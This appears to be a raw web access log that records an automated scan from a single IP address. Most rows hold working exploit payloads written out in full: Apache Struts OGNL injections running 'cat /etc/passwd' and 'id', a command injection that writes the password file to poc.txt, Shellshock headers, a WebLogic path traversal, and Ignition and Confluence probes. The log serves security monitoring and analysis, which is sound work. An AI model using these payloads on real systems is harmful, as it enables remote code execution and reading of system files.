| 20220127-19:05:39 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36 | /devmode.action?debug=command&expression=(%23_memberAccess[%22allowStaticMethodAccess%22]%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D%23foo%2C@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27cat%20/etc/passwd%27).getInputStream())) |
| 20220127-19:05:46 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36 | https://54.89.6.87/manage/account/login?redirect=%2Fmanage |
| 20220127-19:05:48 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36 | /qvisdvr/ |
| 20220127-19:05:56 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 | /v1/backend1 |
| 20220127-19:05:58 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36 | /v1/24IBLZ4sgyYQinqYiEJbrbPdz2J.php |
| 20220127-19:06:09 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36 | /x |
| 20220127-19:06:35 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36 | /jars/upload |
| 20220127-19:06:38 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36 | /manager/radius/server_ping.php?ip=127.0.0.1|cat%20/etc/passwd>../../poc.txt&id=1 |
| 20220127-19:06:39 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 | /poc.txt |
| 20220127-19:06:58 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36 | /console/images/%252e%252e%252fconsole.portal |
| 20220127-19:07:05 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36 | /24IBLSf0sVWzPAmp3k9mPNGksk0.php |
| 20220127-19:07:29 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F | /_ignition/execute-solution |
| 20220127-19:07:30 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36 | /_ignition/execute-solution |
| 20220127-19:07:31 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36 | /_ignition/execute-solution |
| 20220127-19:07:31 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 | /_ignition/execute-solution |
| 20220127-19:07:31 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36 | /pages/createpage-entervariables.action?SpaceKey=x |
| 20220127-19:07:32 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 | /_ignition/execute-solution |
| 20220127-19:07:32 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36 | /pages/createpage-entervariables.action |
| 20220127-19:07:32 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36 | /_ignition/execute-solution |
| 20220127-19:07:32 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36 | /confluence/pages/createpage-entervariables.action?SpaceKey=x |
| 20220127-19:07:33 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36 | /confluence/pages/createpage-entervariables.action |
| 20220127-19:07:33 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36 | /wiki/pages/createpage-entervariables.action?SpaceKey=x |
| 20220127-19:07:34 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 | /wiki/pages/createpage-entervariables.action |
| 20220127-19:07:35 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36 | /pages/doenterpagevariables.action |
| 20220127-19:07:35 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36 | /pages/createpage.action?spaceKey=myproj |
| 20220127-19:07:36 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36 | /pages/templates2/viewpagetemplate.action |
| 20220127-19:07:36 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36 | /pages/createpage-entervariables.action |
| 20220127-19:07:37 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36 | /template/custom/content-editor |
| 20220127-19:07:37 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36 | /templates/editor-preload-container |
| 20220127-19:07:38 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 | /users/user-dark-features |
| 20220127-19:09:19 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36 | () { ignored; }; echo Content-Type |
| 20220127-19:09:19 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36 | () { ignored; }; echo Content-Type |
| 20220127-19:09:20 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36 | /index.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} |
| 20220127-19:09:20 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36 | () { ignored; }; echo Content-Type |
| 20220127-19:09:20 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36 | /index.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} |
| 20220127-19:09:20 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36 | () { ignored; }; echo Content-Type |
| 20220127-19:09:21 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 | /index.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} |
| 20220127-19:09:21 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36 | () { ignored; }; echo Content-Type |
| 20220127-19:09:21 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36 | /login.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} |
| 20220127-19:09:21 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36 | () { ignored; }; echo Content-Type |
| 20220127-19:09:22 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36 | /login.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} |
| 20220127-19:09:22 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36 | () { ignored; }; echo Content-Type |
| 20220127-19:09:22 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36 | /login.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} |
| 20220127-19:09:23 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 | /index.action?redirect%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D |
| 20220127-19:09:23 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36 | /index.action?action%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D |
| 20220127-19:09:24 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 | /index.action?redirectAction%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D |